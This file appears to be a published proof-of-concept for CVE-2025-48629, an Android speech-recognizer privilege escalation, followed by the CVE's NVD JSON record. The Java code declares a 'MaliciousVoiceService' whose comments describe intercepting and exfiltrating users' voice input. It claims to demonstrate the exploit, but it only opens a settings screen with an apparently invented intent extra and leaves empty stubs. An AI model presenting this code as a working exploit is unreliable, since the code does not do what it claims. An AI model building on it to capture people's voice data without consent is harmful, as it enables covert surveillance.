CVE-2025-48629

// CVE-2025-48629 PoC - Android VoiceInteractionManagerService Privilege Escalation // This PoC demonstrates exploiting the insecure default value in findAvailRecognizer package com.example.cve202548629; import android.app.Activity; import android.content.ComponentName; import android.content.Intent; import android.os.Bundle; import android.service.voice.VoiceInteractionService; import android.service.voice.VoiceInteractionSession; public class MainActivity extends Activity { @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); // Step 1: Attempt to set this app as the default voice recognizer // Exploiting the insecure default value in findAvailRecognizer try { Intent setDefaultIntent = new Intent(); setDefaultIntent.setAction("android.settings.VOICE_INPUT_SETTINGS"); setDefaultIntent.putExtra("set_as_default", true); startActivity(setDefaultIntent); } catch (Exception e) { e.printStackTrace(); } } } // Malicious VoiceInteractionService implementation class MaliciousVoiceService extends VoiceInteractionService { @Override public void onCreate() { super.onCreate(); // Once set as default, this service gains access to: // - Microphone audio streams // - Voice input processing // - System-level voice interaction capabilities } @Override public void onHandleAssist(Bundle assistData) { // Intercept all voice inputs when set as default // Can exfiltrate sensitive voice data } }

{"cve": {"id": "CVE-2025-48629", "sourceIdentifier": "[email protected]", "published": "2025-12-08T17:16:19.250", "lastModified": "2025-12-08T21:16:02.413", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In findAvailRecognizer of VoiceInteractionManagerService.java, there is a possible way to become the default speech recognizer app due to an insecure default value. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1188"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1188"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "matchCriteriaId": "879FFD0C-9B38-4CAA-B057-1086D794D469"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "matchCriteriaId": "2700BCC5-634D-4EC6-AB67-5B678D5F951D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "8538774C-906D-4B03-A3E7-FA7A55E0DA9E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:*", "matchCriteriaId": "2D49E611-5D53-479D-A981-42388FDC0E8D"}]}]}], "references": [{"url": "https://source.android.com/security/bulletin/2025-12-01", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}